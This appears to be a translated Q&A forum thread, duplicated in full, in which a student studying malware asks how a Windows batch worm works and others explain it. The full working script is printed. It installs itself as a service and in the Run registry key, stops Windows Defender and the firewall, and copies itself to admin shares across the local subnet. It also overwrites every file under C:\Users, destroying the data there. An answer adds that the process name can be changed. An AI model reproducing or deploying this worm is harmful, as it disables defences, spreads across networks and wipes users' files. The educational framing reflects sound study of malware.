这个 "batch worm" 是如何工作的?
How this "batch worm" works?
@echo off
SET i=0
SET "NomeProcesso=DaMonki.exe"
SET "NomeService=DaMonki"
rem <=== run as service ===>
echo sc create %NomeService% binpath=%0 > service.bat
echo sc start %NomeService% >> service.bat
attrib +h +r +s service.bat
start service.bat
rem <=== startup registry ===>
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0
rem <=== kill firewall and windows defender ===>
net stop "Windows Defender Service"
net stop "Windows Firewall"
rem <=== INFECT NETWORK!!! ===>
:Worm
net use Z: \192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto Infect) else (set /a i=i+1)
goto Worm
rem <=== infect *.* in C:\Users ===>
:Infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)
for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)
我正在为我的 TCC 研究恶意软件和恶意程序,我发现了这个批处理蠕虫样本,我可以理解大部分代码,但我无法理解 "Infect Network" 和 "Infect *.* in C:\Users"行。
这些行对我的电脑有什么作用?它只会 "infect" 文件还是会毁掉它们?这种蠕虫只会在受害网络中传播?这段代码有什么限制?防病毒软件如何阻止它?
如果您有一些不错的 malware/software 工程电子书和论文,请在评论中留下链接。
对不起,我的语言不好。
请勿恶意使用此代码!
"Infect Network" 部分尝试获取到本地网络 IP 地址的网络使用连接,读取系统中的用户列表并将文件复制到他们的本地启动目录中,以便在他们运行时运行登录到他们的机器。
感染用户部分正在将 Users 目录中的几个文件重命名为 .bat 扩展名,然后以该名称复制另一个文件。这意味着多个文件被迫具有所需 .bat 文件的内容。这可能会运行一些其他恶意代码或运行之前复制的可执行文件。
如果您需要进一步说明,请告诉我。
.表示感染C:\users配置文件中的所有
顺便说一下,使用设置命令 (SET Process=DaMonki),您可以将“DaMonki”更改为其他任何内容。
@echo off
SET i=0
SET "NomeProcesso=DaMonki.exe"
SET "NomeService=DaMonki"
rem <=== run as service ===>
echo sc create %NomeService% binpath=%0 > service.bat
echo sc start %NomeService% >> service.bat
attrib +h +r +s service.bat
start service.bat
rem <=== startup registry ===>
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0
rem <=== kill firewall and windows defender ===>
net stop "Windows Defender Service"
net stop "Windows Firewall"
rem <=== INFECT NETWORK!!! ===>
:Worm
net use Z: \192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto Infect) else (set /a i=i+1)
goto Worm
rem <=== infect *.* in C:\Users ===>
:Infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)
for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)
我正在为我的 TCC 研究恶意软件和恶意程序,我发现了这个批处理蠕虫样本,我可以理解大部分代码,但我无法理解 "Infect Network" 和 "Infect *.* in C:\Users"行。
这些行对我的电脑有什么作用?它只会 "infect" 文件还是会毁掉它们?这种蠕虫只会在受害网络中传播?这段代码有什么限制?防病毒软件如何阻止它?
如果您有一些不错的 malware/software 工程电子书和论文,请在评论中留下链接。
对不起,我的语言不好。
请勿恶意使用此代码!
"Infect Network" 部分尝试获取到本地网络 IP 地址的网络使用连接,读取系统中的用户列表并将文件复制到他们的本地启动目录中,以便在他们运行时运行登录到他们的机器。
感染用户部分正在将 Users 目录中的几个文件重命名为 .bat 扩展名,然后以该名称复制另一个文件。这意味着多个文件被迫具有所需 .bat 文件的内容。这可能会运行一些其他恶意代码或运行之前复制的可执行文件。
如果您需要进一步说明,请告诉我。
.表示感染C:\users配置文件中的所有
顺便说一下,使用设置命令 (SET Process=DaMonki),您可以将“DaMonki”更改为其他任何内容。